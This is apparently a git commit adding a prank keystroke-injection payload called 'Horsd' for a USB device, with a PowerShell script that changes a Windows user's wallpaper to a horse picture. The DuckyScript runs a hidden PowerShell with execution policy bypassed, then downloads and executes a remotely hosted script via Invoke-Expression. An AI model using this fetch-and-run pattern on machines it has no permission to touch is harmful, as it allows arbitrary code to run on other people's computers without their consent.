Commit Horsd payload

pull/322/head
Rayden 2023-05-10 04:30:53 +10:00
parent 094434e61c
commit 3764def08d
No known key found for this signature in database
GPG Key ID: CC3FFEC64F1DEF2D
3 changed files with 57 additions and 0 deletions

View File

@ -0,0 +1,3 @@
# Horsd - In memorium to my Nan
Changes the target users background to a picture of a brown horse running, a nod to my nan's laptop background.
** This script requires very minor configuration found on LN:23 of the payload, set your own direct access link to the horsd.ps1 powershell script.

View File

@ -0,0 +1,18 @@
$Image="%UserProfile%/horse.jpg"
$code = @'
using System.Runtime.InteropServices;
namespace Win32{
public class Wallpaper{
[DllImport("user32.dll", CharSet=CharSet.Auto)]
static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ;
public static void SetWallpaper(string thePath){
SystemParametersInfo(20,0,thePath,3);
}
}
}
'@
add-type $code
[Win32.Wallpaper]::SetWallpaper($Image)

View File

@ -0,0 +1,36 @@
REM Title: Horsd
REM Author: MocconaCoffee
REM Description: A simple script that will change the users wallpaper to Brown Horse that is running.
REM Dedicated to: This script is a toast to my Nan that passed recently (she pioneered horse backgrounds on her decade-old laptop.)
REM Target OS: Windows 10
REM Required Configurations: Ensure that you have amended changes to the URL with a direct link to the script hosted by your own hosting service. DO NOT use GitHub as a medium for staging the script.
DELAY 3000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Invoke-WebRequest -Uri https://i.imgur.com/jwstWRR.jpg -OutFile horse.jpg
ENTER
DELAY 100
STRING exit
ENTER
DELAY 1000
GUI r
DELAY 300
REM ### REQUIRES CONFIGURATION ###
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr <your own hosted link here>/horsd.ps1?dl=1; invoke-expression $pl
REM ### ---------------------- ###
ENTER
DELAY 1000
GUI r
DELAY 300
STRING powershell
ENTER
DELAY 300
STRING Remove-Item horse.jpg
ENTER
DELAY 300
STRING exit
ENTER